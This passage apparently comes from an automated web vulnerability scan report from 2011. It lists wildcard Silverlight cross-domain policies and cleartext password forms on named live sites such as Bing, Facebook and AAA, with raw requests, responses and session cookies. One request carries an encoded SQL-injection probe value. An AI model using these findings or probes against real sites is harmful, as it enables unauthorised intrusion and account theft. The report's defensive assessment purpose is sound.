               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

6.19. http://wa.stubhub.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wa.stubhub.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: wa.stubhub.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:36:25 GMT
Server: Omniture DC/2.0.0
xserver: www419
Content-Length: 263
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

6.20. http://a1.bing4.com/clientaccesspolicy.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://a1.bing4.com
Path:	/clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: a1.bing4.com

Response

HTTP/1.0 200 OK
Cache-Control: private,max-age=0
Content-Type: text/xml
Last-Modified: Tue, 14 Dec 2010 01:03:25 GMT
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Date: Tue, 19 Jul 2011 12:23:40 GMT
Content-Length: 1766
Connection: close
Set-Cookie: _SS=SID=ACC9F2D17EA74196BBE197B558762F0B; domain=.bing4.com; path=/
Set-Cookie: SRCHUID=V=2&GUID=E72EC00875854ADDAEF44F551ACC381B; expires=Thu, 18-Jul-2013 12:23:40 GMT; path=/
Set-Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110719; expires=Thu, 18-Jul-2013 12:23:40 GMT; domain=.bing4.com; path=/

<?xml version="1.0" encoding="utf-8"?>

<access-policy>
<cross-domain-access>
<policy>
</policy>
<policy>
<allow-from http-request-headers="*"
...[SNIP]...
<domain uri="http://*.msn.com" />
...[SNIP]...
<domain uri="http://*.microsoft.com" />
...[SNIP]...
<domain uri="http://www.bing.com" />
...[SNIP]...
<domain uri="http://*.bing4.com" />
...[SNIP]...
<domain uri="http://*.virtualearth.net" />
...[SNIP]...
<domain uri="http://*.virtualearth-int.net" />
...[SNIP]...

6.21. http://a2.bing4.com/clientaccesspolicy.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://a2.bing4.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: a2.bing4.com

Response

HTTP/1.0 200 OK
Cache-Control: private,max-age=0
Content-Type: text/xml
Last-Modified: Tue, 14 Dec 2010 01:03:25 GMT
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Date: Tue, 19 Jul 2011 12:23:43 GMT
Content-Length: 1766
Connection: close
Set-Cookie: _SS=SID=FD84A860CA4F429FA89BA7D404B5A201; domain=.bing4.com; path=/
Set-Cookie: SRCHUID=V=2&GUID=FB57DCBA77094F5D84B5629ECCBB9DB2; expires=Thu, 18-Jul-2013 12:23:43 GMT; path=/
Set-Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110719; expires=Thu, 18-Jul-2013 12:23:43 GMT; domain=.bing4.com; path=/

<?xml version="1.0" encoding="utf-8"?>

<access-policy>
<cross-domain-access>
<policy>
</policy>
<policy>
<allow-from http-request-headers="*"
...[SNIP]...
<domain uri="http://*.msn.com" />
...[SNIP]...
<domain uri="http://*.microsoft.com" />
...[SNIP]...
<domain uri="http://www.bing.com" />
...[SNIP]...
<domain uri="http://*.bing4.com" />
...[SNIP]...
<domain uri="http://*.virtualearth.net" />
...[SNIP]...
<domain uri="http://*.virtualearth-int.net" />
...[SNIP]...

6.22. http://a3.bing4.com/clientaccesspolicy.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://a3.bing4.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: a3.bing4.com

Response

HTTP/1.0 200 OK
Cache-Control: private,max-age=0
Content-Type: text/xml
Last-Modified: Tue, 14 Dec 2010 01:03:25 GMT
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Date: Tue, 19 Jul 2011 12:23:50 GMT
Content-Length: 1766
Connection: close
Set-Cookie: _SS=SID=0E1782A1AE7D45E782E0CB84B3629234; domain=.bing4.com; path=/
Set-Cookie: SRCHUID=V=2&GUID=A556F0A2559B466DAABCC17A7CE2BA9D; expires=Thu, 18-Jul-2013 12:23:50 GMT; path=/
Set-Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110719; expires=Thu, 18-Jul-2013 12:23:50 GMT; domain=.bing4.com; path=/

<?xml version="1.0" encoding="utf-8"?>

<access-policy>
<cross-domain-access>
<policy>
</policy>
<policy>
<allow-from http-request-headers="*"
...[SNIP]...
<domain uri="http://*.msn.com" />
...[SNIP]...
<domain uri="http://*.microsoft.com" />
...[SNIP]...
<domain uri="http://www.bing.com" />
...[SNIP]...
<domain uri="http://*.bing4.com" />
...[SNIP]...
<domain uri="http://*.virtualearth.net" />
...[SNIP]...
<domain uri="http://*.virtualearth-int.net" />
...[SNIP]...

6.23. http://a4.bing4.com/clientaccesspolicy.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://a4.bing4.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: a4.bing4.com

Response

HTTP/1.0 200 OK
Cache-Control: private,max-age=0
Content-Type: text/xml
Last-Modified: Tue, 14 Dec 2010 01:03:25 GMT
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Date: Tue, 19 Jul 2011 23:01:40 GMT
Content-Length: 1766
Connection: close
Set-Cookie: _SS=SID=CCF610C6100E4CBA9C084E2CCCED660B; domain=.bing4.com; path=/
Set-Cookie: SRCHUID=V=2&GUID=F6DF14FC715246E9B38F9A207195031D; expires=Thu, 18-Jul-2013 23:01:39 GMT; path=/
Set-Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110719; expires=Thu, 18-Jul-2013 23:01:39 GMT; domain=.bing4.com; path=/

<?xml version="1.0" encoding="utf-8"?>

<access-policy>
<cross-domain-access>
<policy>
</policy>
<policy>
<allow-from http-request-headers="*"
...[SNIP]...
<domain uri="http://*.msn.com" />
...[SNIP]...
<domain uri="http://*.microsoft.com" />
...[SNIP]...
<domain uri="http://www.bing.com" />
...[SNIP]...
<domain uri="http://*.bing4.com" />
...[SNIP]...
<domain uri="http://*.virtualearth.net" />
...[SNIP]...
<domain uri="http://*.virtualearth-int.net" />
...[SNIP]...

6.24. http://api.bing.com/clientaccesspolicy.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://api.bing.com
Path:	/clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: api.bing.com

Response

HTTP/1.0 200 OK
Cache-Control: no-cache
Content-Length: 348
Content-Type: text/xml
Last-Modified: Tue, 09 Feb 2010 19:32:41 GMT
ETag: 3B4046BBE5F127E45C1A35A93B86C3890000015C
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Date: Tue, 19 Jul 2011 14:28:14 GMT
Connection: close
Set-Cookie: _FS=ui=en-US&mkt=en-US; domain=.bing.com; path=/

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*.bing.com"/>
</allow-from>

...[SNIP]...

6.25. http://ts1.mm.bing.net/clientaccesspolicy.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://ts1.mm.bing.net
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ts1.mm.bing.net

Response

HTTP/1.0 200 OK
Content-Length: 1766
Content-Type: text/xml
Last-Modified: Tue, 14 Dec 2010 01:03:25 GMT
Date: Tue, 19 Jul 2011 12:23:40 GMT
Connection: close
Cache-Control: public, max-age=3600

<?xml version="1.0" encoding="utf-8"?>

<access-policy>
<cross-domain-access>
<policy>
</policy>
<policy>
<allow-from http-request-headers="*"
...[SNIP]...
<domain uri="http://*.msn.com" />
...[SNIP]...
<domain uri="http://*.microsoft.com" />
...[SNIP]...
<domain uri="http://*.bing4.com" />
...[SNIP]...
<domain uri="http://*.virtualearth.net" />
...[SNIP]...
<domain uri="http://*.virtualearth-int.net" />
...[SNIP]...

6.26. http://ts2.mm.bing.net/clientaccesspolicy.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://ts2.mm.bing.net
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ts2.mm.bing.net

Response

HTTP/1.0 200 OK
Content-Length: 1766
Content-Type: text/xml
Last-Modified: Tue, 14 Dec 2010 01:03:25 GMT
Date: Tue, 19 Jul 2011 12:23:41 GMT
Connection: close
Cache-Control: public, max-age=3600

<?xml version="1.0" encoding="utf-8"?>

<access-policy>
<cross-domain-access>
<policy>
</policy>
<policy>
<allow-from http-request-headers="*"
...[SNIP]...
<domain uri="http://*.msn.com" />
...[SNIP]...
<domain uri="http://*.microsoft.com" />
...[SNIP]...
<domain uri="http://*.bing4.com" />
...[SNIP]...
<domain uri="http://*.virtualearth.net" />
...[SNIP]...
<domain uri="http://*.virtualearth-int.net" />
...[SNIP]...

6.27. http://ts3.mm.bing.net/clientaccesspolicy.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://ts3.mm.bing.net
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ts3.mm.bing.net

Response

HTTP/1.0 200 OK
Content-Length: 1766
Content-Type: text/xml
Last-Modified: Tue, 14 Dec 2010 01:03:25 GMT
Date: Tue, 19 Jul 2011 12:23:49 GMT
Connection: close
Cache-Control: public, max-age=3600

<?xml version="1.0" encoding="utf-8"?>

<access-policy>
<cross-domain-access>
<policy>
</policy>
<policy>
<allow-from http-request-headers="*"
...[SNIP]...
<domain uri="http://*.msn.com" />
...[SNIP]...
<domain uri="http://*.microsoft.com" />
...[SNIP]...
<domain uri="http://*.bing4.com" />
...[SNIP]...
<domain uri="http://*.virtualearth.net" />
...[SNIP]...
<domain uri="http://*.virtualearth-int.net" />
...[SNIP]...

6.28. http://ts4.mm.bing.net/clientaccesspolicy.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://ts4.mm.bing.net
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ts4.mm.bing.net

Response

6.29. http://profile.live.com/clientaccesspolicy.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://profile.live.com
Path:	/clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: profile.live.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/xml; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-Imf: 0a36844a-00fd-4efb-91e4-3337bf3fc5c4
Set-Cookie: E=P:QqwkiDcUzog=:DUg6QX2uWRNBr/Q+WUc/yg+CrCDGmConIiB1FazUDLA=:F; domain=.live.com; path=/
X-AspNet-Version: 4.0.30319
Set-Cookie: E=P:QqwkiDcUzog=:DUg6QX2uWRNBr/Q+WUc/yg+CrCDGmConIiB1FazUDLA=:F; domain=.live.com; path=/
Set-Cookie: xidseq=2; domain=.live.com; path=/
Set-Cookie: LD=; domain=.live.com; expires=Tue, 19-Jul-2011 12:50:24 GMT; path=/
Set-Cookie: wla42=; domain=live.com; expires=Tue, 26-Jul-2011 14:30:24 GMT; path=/
Set-Cookie: sc_clustbl_142=8ccc0e93c93d866c; domain=profile.live.com; expires=Thu, 18-Aug-2011 14:30:24 GMT; path=/
X-Powered-By: ASP.NET
X-Content-Type-Options: nosniff
X-MSNSERVER: H: BL2XXXXXC645 V: 1 D: 7/13/2011
Date: Tue, 19 Jul 2011 14:30:24 GMT
Connection: close
Content-Length: 400

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="http://msc.wlxrs.com"/>

...[SNIP]...

7. Cleartext submission of password previous next
There are 8 instances of this issue:

http://digg.com/submit
http://forum.redbyte.ro/
http://waypointlivingspaces.com/function.mysql-connect
http://waypointlivingspaces.com/locate-dealer
http://waypointlivingspaces.com/user
http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html
http://www.facebook.com/r.php
http://www.nne.aaa.com/en-nne/Pages/Home.aspx

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.

7.1. http://digg.com/submit previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://digg.com
Path:	/submit

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://digg.com/submit?phase=2&url=http%3A%2F%2Fwww.factset.com%2Fproducts%2Fprivateequity&title=Private+Equity%2C+Venture+Capital%2C+Ownership%2C+M%26A%2C+Idea+Screening%2C+Reporting+%7C+FactSet+Research+Systems

The form contains the following password field:

password

Request

GET /submit?phase=2&url=http%3A%2F%2Fwww.factset.com%2Fproducts%2Fprivateequity&title=Private+Equity%2C+Venture+Capital%2C+Ownership%2C+M%26A%2C+Idea+Screening%2C+Reporting+%7C+FactSet+Research+Systems HTTP/1.1
Host: digg.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d=85df7d9bad8e8d89082fa2e639823b583fe18ba49cd23f778d390a8b56dda4a2

Response

7.2. http://forum.redbyte.ro/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://forum.redbyte.ro
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://forum.redbyte.ro/login.aspx

The form contains the following password field:

parola

Request

GET / HTTP/1.1
Host: forum.redbyte.ro
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 17:27:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=iso-8859-1
Content-Length: 61872

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>UNIVERSITATEA DE MEDICINA SI FARMACIE "IULIU HATIEGANU"</title>
<script type="text/JavaScript">
<!-
...[SNIP]...
<td bgcolor="#F0F0F0"><form name="form1" method="post" action="login.aspx">
<table width="100%" border="0" cellspacing="1" cellpadding="5">
...[SNIP]...
<td><input name="parola" type="password" id="parola"></td>
...[SNIP]...

7.3. http://waypointlivingspaces.com/function.mysql-connect previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://waypointlivingspaces.com
Path:	/function.mysql-connect

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://waypointlivingspaces.com/function.mysql-connect?destination=function.mysql-connect

The form contains the following password field:

pass

Request

GET /function.mysql-connect HTTP/1.1
Host: waypointlivingspaces.com
Proxy-Connection: keep-alive
Referer: http://waypointlivingspaces.com/locate-dealer?zip=%2527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe2d9d7ad8ae79606f307f1e56494fe09=02isqjnj84clkgrigupugsjs41; has_js=1; __utma=150814896.1501451648.1311108783.1311108783.1311108783.1; __utmb=150814896.6.9.1311109188886; __utmc=150814896; __utmz=150814896.1311108783.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Date: Tue, 19 Jul 2011 21:04:29 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Tue, 19 Jul 2011 21:04:29 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17476

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head
...[SNIP]...
<div class="content">
<form action="/function.mysql-connect?destination=function.mysql-connect" accept-charset="UTF-8" method="post" id="user-login-form">
<div>
...[SNIP]...
</label>
<input type="password" name="pass" id="edit-pass" maxlength="60" size="15" class="form-text required" />
</div>
...[SNIP]...

7.4. http://waypointlivingspaces.com/locate-dealer previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://waypointlivingspaces.com
Path:	/locate-dealer

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://waypointlivingspaces.com/locate-dealer?destination=node%2F1456

The form contains the following password field:

pass

Request

GET /locate-dealer HTTP/1.1
Host: waypointlivingspaces.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://waypointlivingspaces.com/introducing-waypoint/?banner=110523
Cookie: SESSe2d9d7ad8ae79606f307f1e56494fe09=p5hnf2vbssre64l1tg1gvd29q4; has_js=1; __utma=150814896.783126044.1311108308.1311108308.1311108308.1; __utmb=150814896.2.9.1311108318174; __utmc=150814896; __utmz=150814896.1311108308.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

7.5. http://waypointlivingspaces.com/user previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://waypointlivingspaces.com
Path:	/user

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://waypointlivingspaces.com/user

The form contains the following password field:

pass

Request

GET /user HTTP/1.1
Host: waypointlivingspaces.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe2d9d7ad8ae79606f307f1e56494fe09=02isqjnj84clkgrigupugsjs41; has_js=1; __utma=150814896.1501451648.1311108783.1311108783.1311108783.1; __utmb=150814896.2.9.1311108792839; __utmc=150814896; __utmz=150814896.1311108783.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:55:03 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Tue, 19 Jul 2011 20:55:04 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17270

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head
...[SNIP]...
<div id="main-content" class="region clear-block">
<form action="/user" accept-charset="UTF-8" method="post" id="user-login">
<div>
...[SNIP]...
</label>
<input type="password" name="pass" id="edit-pass" maxlength="128" size="60" class="form-text required" />
<div class="description">
...[SNIP]...

7.6. http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.boston.com
Path:	/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html?p1=News_links

The form contains the following password field:

pass

Request

GET /Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html?p1=News_links HTTP/1.1
Host: www.boston.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: OAX=rcHW803KasIABjIw; s_vi=[CS]v1|26E5356B85012F68-4000011580017645[CE]; __unam=b6206f2-12fdeb21084-67db55f0-1; anonId=2115b2a8-118a-4f17-925c-f4ae050c3414; bcpage=7; __qca=P0-192291824-1311108181675; s_cc=true; s_pv=Boston.com%20home%20page; s_sq=nytbglobe%3D%2526pid%253DBoston.com%252520home%252520page%2526pidt%253D1%2526oid%253Dhttp%25253A//www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7%2526ot%253DA; s_ppv=16

Response

7.7. http://www.facebook.com/r.php previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/r.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.facebook.com/r.php

The form contains the following password field:

reg_passwd__

Request

GET /r.php HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?&show_faces=true&action=like&font=arial&layout=standard&colorscheme=light&href=http%3A%2F%2Fwww.bing.com%3Fssd%3D20110719_0700%26ssh%3DS262080510%26FORM%3DHPFBLK%26mkt%3Den-US%26&width=400&height=80
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: __utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: svid=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.108.49
X-Cnection: close
Date: Tue, 19 Jul 2011 14:58:57 GMT
Content-Length: 30768

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/r.php";window._EagleEyeSeed="TYhN";</script><noscript> <m
...[SNIP]...
<div id="reg_box"><form method="post" id="reg" name="reg" onsubmit="return function(event){return false;}.call(this,event)!==false && Event.__inlineSubmit(this,event)"><input type="hidden" autocomplete="off" name="post_form_id" value="fedd9a47074e63aa1e84ddd49e2a5b8d" />
...[SNIP]...
<div class="field_container"><input type="password" class="inputtext" id="reg_passwd__" name="reg_passwd__" value="" /></div>
...[SNIP]...

7.8. http://www.nne.aaa.com/en-nne/Pages/Home.aspx previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.nne.aaa.com
Path:	/en-nne/Pages/Home.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.nne.aaa.com/en-nne/Pages/Home.aspx?zip=05672&referer=www.aaa.com

The form contains the following password field:

Password

Request

GET /en-nne/Pages/Home.aspx?zip=05672&referer=www.aaa.com HTTP/1.1
Host: www.nne.aaa.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.aaa.com/scripts/WebObjects.dll/ZipCode.woa/wa/route?rclub=36&rurl=http%3a%2f%2fwww.nne.aaa.com%2fen-nne%2fPages%2fHome.aspx
Cookie: zipcode=05672|AAA|36

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 19:04:25 GMT
Server: Microsoft-IIS/6.0
ACSC: WEB04
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: acezipcode=36|AAA|05672; expires=Thu, 19-Jul-2012 19:04:24 GMT; path=/
Cache-Control: private
Expires: Tue, 19 Jul 2011 19:07:25 GMT
Vary: *, Accept-Encoding, User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 97400

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:o="urn:schemas-microsoft-com:office:office" __expr-val-dir="ltr" dir="ltr">
<
...[SNIP]...
<body scroll="yes" onload="javascript:if (typeof(_spBodyOnLoadWrapper) != 'undefined') _spBodyOnLoadWrapper();" class="">
<form name="aspnetForm" method="post" action="Home.aspx?zip=05672&referer=www.aaa.com" onsubmit="javascript:return WebForm_OnSubmit();" id="aspnetForm">
<div>
...[SNIP]...
his.defaultValue) {this.value=''; this.className='txt txt-username black';}" onBlur="if(this.value=='') {this.value = this.defaultValue; this.className='txt txt-username grey';}"/>
<input type="password" id="Password1" name="Password" value="" class="txt txt-pwd bgimg" size="15" maxlength="30" onfocus="if (this.value.length == 0) {this.className='txt txt-pwd nobgimg'}; setEnd(this);" onBlur="if (this.value.length == 0) {this.className='txt txt-pwd bgimg';} else {this.className='txt txt-pwd nobgimg';}"/>
